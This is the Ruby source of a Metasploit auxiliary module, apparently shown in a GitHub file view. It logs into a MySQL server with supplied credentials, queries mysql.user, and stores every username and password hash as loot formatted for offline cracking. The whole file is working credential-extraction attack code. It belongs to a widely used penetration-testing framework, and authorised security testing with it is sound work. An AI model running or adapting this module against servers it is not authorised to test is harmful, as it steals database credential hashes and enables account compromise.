metasploit-framework/modules/auxiliary/scanner/mysql/mysql_hashdump.rb

107 lines
2.6 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MYSQL
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'MYSQL Password Hashdump',
'Description' => %Q{
This module extracts the usernames and encrypted password
hashes from a MySQL server and stores them for later cracking.
},
'Author' => ['theLightCosine'],
'License' => MSF_LICENSE
)
end
def run_host(ip)
if (not mysql_login_datastore)
return
end
service_data = {
address: ip,
port: rport,
service_name: 'mysql',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
private_data: datastore['PASSWORD'],
private_type: :password,
username: datastore['USERNAME']
}
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}
login_data.merge!(service_data)
create_credential_login(login_data)
#Grabs the username and password hashes and stores them as loot
res = mysql_query("SELECT user,password from mysql.user")
if res.nil?
print_error("There was an error reading the MySQL User Table")
return
end
service_data = {
address: ::Rex::Socket.getaddress(rhost,true),
port: rport,
service_name: 'mysql',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
jtr_format: 'mysql,mysql-sha1',
module_fullname: self.fullname,
private_type: :nonreplayable_hash
}
credential_data.merge!(service_data)
if res.size > 0
res.each do |row|
credential_data[:username] = row[0]
credential_data[:private_data] = row[1]
print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}")
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}
login_data.merge!(service_data)
create_credential_login(login_data)
end
end
end
end